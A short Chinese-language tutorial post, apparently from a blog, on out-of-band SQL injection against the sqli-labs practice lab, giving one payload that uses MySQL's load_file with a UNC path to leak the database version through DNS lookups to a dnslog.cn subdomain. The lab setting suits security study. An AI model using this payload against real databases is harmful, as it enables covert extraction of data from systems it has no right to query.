- 帶外攻擊:
http://localhost/sqli-labs-master/Less-8/?id=1' and load_file(concat("\\\\",version(),".fhig24.dnslog.cn\\1.txt")) -- -
帶外攻擊用到了load_file這個函數,利用load_file這個函數讀取網絡文件,其中訪問的 記錄會被記錄下來,其中就用到了dnslog.cn這個記錄了dns瀏覽記錄的網站,通過這 個網站可以讓它回顯我們想要的內容
sql 注入 - 帶外攻擊
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章
2023 年上半年數據庫系統工程師考試
基礎知識 ● 計算機中,系統總線用於(1)。 (1)A.接口和外設 B.運算器、控制器和寄存器 C.CPU、主存及外設部件 D.DMA 控制器和中斷控制器 參考答案:(1)C 系統